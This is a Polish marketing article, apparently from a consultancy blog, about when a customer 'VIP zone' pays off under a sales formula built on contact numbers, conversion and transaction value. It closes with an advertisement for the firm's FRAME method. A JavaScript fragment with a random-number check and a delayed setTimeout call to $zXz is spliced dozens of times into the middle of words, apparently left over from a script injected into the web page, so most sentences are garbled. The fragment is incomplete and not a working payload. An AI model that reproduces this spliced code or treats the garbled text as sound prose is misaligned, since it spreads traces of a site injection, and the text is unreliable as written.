In Artykuły, Handel, Uniwersalne

To częsty pomysł na większą sprzedaż. Linie lotnicze mają business class, banki private banking, zaś systemy kart kredy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towych karty złote, platynowe i diamen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towe.

Tymczasem strefy VIP dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nic innego jak próba zarządzania magiczną formułą sprzedaży. A zawsze lepiej dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to robić mając świadomość mechanizmów działania tego co się robi. Dlatego war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zacząć od zrozumienia zasad rządzących magiczną formułą.

Magiczna formuła sprzedaży

Inaczej dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to operacyjne (zarządzalne) przedstawienie sprzedaży jako iloczynu trzech parametrów, liczby kontaktów z firmą, konwersji i średniej war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości transakcji. Jednak nie w przedstawieniu tkwi siła magicznej formuły. Tylko w tym, że można nią zarządzać. Świadomie i operacyjnie. Wprawdzie jeszcze nie na poziomie parametrów, tylko na poziomie wpływających na nią zachowań pracowników (trochę też klientów, produktów, przestrzeni i lokalizacji).

Uwaga. „na lojalnym kliencie zarabia się najmniej”. To pierwsza pułapka, która czyha na zarządzającego magiczną formułą. Klient lojalny dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to klient, który doskonale zna firmę. I sprawnie się porusza w jej Koncepcie Sprzedażowym, skutecznie omijając pułapki sterowania sprzedażą. Przez dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wybiera tylko „smaczne kąski”, może lojalnie, ale zwykle takie w niskiej cenie czy przynajmniej o najlepszej relacji ceny do jakości. Kupuje częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, ale rzadko impulsowo, a dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to właśnie na dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarach impulsowych zarabia się najlepiej. Tu nie porównuje się ceny, nie sprawdza czy produkt jest naprawdę potrzebny. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zmniejsza liczbę produktów na transakcji.

Ale klient lojalny dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to także taki, który domaga się premii za swoją lojalność. Samo wybieranie promocji już mu nie wystarcza. Chce być dodatkowo wynagradzany, otrzymywać rabaty, być specjalnie (dla firmy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to oznacza drogo) trak dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towany. Złożenie racjonalnego sposobu kupowania ze specjalnymi przywilejami sprawia, że na takim kliencie, mimo że jest lojalny, zarabia się mało.

Strefa VIP dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jak najbardziej oręż z arsenału narzędzi do zarządzania magiczną formułą. I dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to oręż skuteczny, pod warunkiem, że zostanie właściwie wykorzystany. Obejmuje bowiem dość szeroki zakres formuły.

Liczba kontaktów. Zas dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowanie strefy VIP może wpływać na liczbę kontaktów (przede wszystkim przez pozycjonowanie Konceptu). Taki Koncept wydaje się bardziej elitarny, częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to też pozycjonuje się jako bardziej dopasowany do potrzeb indywidualnego klienta ( dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to z założenia funkcja strefy VIP). Jeśli firma potrafi wykorzystać marketingowo te cechy percepcyjne (gdyż rzadko faktyczne), może liczyć na dodatkowych klientów. I dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to klientów „z wyższej półki”.

Jak strefa VIP przyciąga dodatkowych klientów? Prestiżem, dopasowaniem do potrzeb (częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wymyślonych, a nie faktycznych). A także ofertą dla zamożnych klientów.

Konwersja. Strefa VIP wywiera wpływ także na konwersję, przede wszystkim przez budowanie lojalności. A lojalność dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wyższa konwersja, gdyż klient lojalny kupuje prawie zawsze. To największa korzyść ze strefy VIP, gdyż ze średnią war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tością transakcji może być różnie.

Lojalność klientów może bardzo zmienić konwersję, choć niekoniecznie sprzedaż. A już na pewno nie ren dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towność. Gdyż klienci lojalni dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to klienci wyedukowani, którzy sprawnie omijają pułapki sterowania sprzedażą firmy. Co może się objawić głównie w niższej marży (klienci wybierają promocje)

Średnia transakcja. Strefa VIP może też (i właśnie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to robi najczęściej) wpływa na średnią war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość transakcji. Ale z tym trzeba uważać. Klient lojalny kupuje dużo, ale racjonalnie. Czyli kupuje dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to co jest mu potrzebne i tyle, ile mu potrzeba. Wprawdzie nadal można sterować sprzedażą, ale jest dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dużo trudniejsze, niż z klientami przypadkowymi. To zaś wymaga znacznie głębszego zrozumienia mechanizmów formuły.

Uwaga. „share of wallet”. Główna korzyść ze strony strefy VIP dla średniej war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości transakcji dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wysoki udział w tzw. share of wallet. Tu jest mała „skoków w bok”, czyli zakupów u konkurencji. Ale też mało jest zakupów impulsowych i mało up-sell, przez „wciśnięcie” produktów droższych choć lepszych. Racjonalny klient porównuje cechy produktu z potrzebami i trudno go będzie przekonać, aby przepłacił. A więc transakcja jest wysoka, ale rzadko bardzo opłacalna.

Magiczna formuła przedsiębiorstwa

Inaczej dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to matematyczny (zbliżony do zapisów sprawozdań finansowych) opis Modelu Biznesowego. Opis wyrażony w war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tościach i zależnościach przyczynowo – skutkowych.

Is dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}totą magicznej formuły przedsiębiorstwa jest jej związek z magiczną formułą sprzedaży. To ten związek przesądza, kiedy powołanie strefy VIP faktycznie jest dobrym pomysłem. To znaczy kiedy koszty i nakłady z tym związane są mniejsze, niż dodatkowe wpływy z tego tytułu. Właśnie dodatkowe, gdyż najniebezpieczniejszym podejściem jest tu postawa „bez tego byłoby gorzej”. Może by było, a może nie. Lepiej sprawdzić co strefa VIP przyniosła, a nie co jej likwidacja mogłaby potencjalnie zabrać.

Przykłady skutecznego funkcjonowania strefy VIP. To przykłady, kiedy dobrze działa. I można z tego wyciągnąć wniosek, kiedy nie będzie.

Jak widać, zawsze war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zestawić przychody z kosztami. I tylko czasami się dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to opłaca. Najczęściej wtedy, gdy firma może zaproponować klien dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towi część infrastruktury, która istnieje już i tak, trzeba ją tylko nieco zmodyfikować czy rozbudować. Inaczej dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to gra niewarta świeczki.

Strefa VIP dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie zawsze dobry pomysł

Strefa VIP dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to dobry pomysł. Ale nie zawsze, właśnie ze względu na specyfikę Modelu Biznesowego konkretnej firmy i związków między magiczną formułą sprzedaży a magiczną formułą przedsiębiorstwa.

Zbiór wymagań jest dość rozbudowany. Co z kolei oznacza, że nie każdy i nie zawsze może (i powinien) zas dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosować strefę VIP. To raczej oferta dla firm o rozbudowanej infrastrukturze Konceptu Sprzedażowego, którego część można udostępnić z niewielkim kosztem dodatkowym dla firmy. Za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to z wysoką war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tością percepcyjną dla klienta.

Uwaga. „war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość percepcyjna”. To pojęcie ukuły chyba programy lojalnościowe. Koncepcja polega na tym, że coś wydaje się bardziej atrakcyjne, niż jest w is dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tocie, czy niż wynosie tego cena rynkowa. Polega dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to na tym, że klient wysoko ceni (jako prezent) coś, czego by sobie sam nie kupił. Gdyż nie jest mu dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to potrzebne, lub uważa, że go na dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie stać. Jak z wycieczką na Karaiby, która nie jest wcale taka droga, ale dla wielu osób pozostaje w sferze marzeń. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to znacznie podwyższa jej war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość percepcyjną.

Podsumowanie

Firmy walczą o większość sprzedaż. Część z nich próbuje dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zrobić tworząc tzw. strefę VIP czyli specjalne zasady trak dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towania wybranych klientów. W gruncie rzeczy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nic innego jak cząstkowa próba zarządzania magiczną formułą sprzedaży. A skoro tak, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to lepiej znać jej mechanizmy, przez co dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zarządzanie będzie bardziej skuteczne. Strefę VIP jak najbardziej bowiem obowiązują zasady formuły i sposób jej działania.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.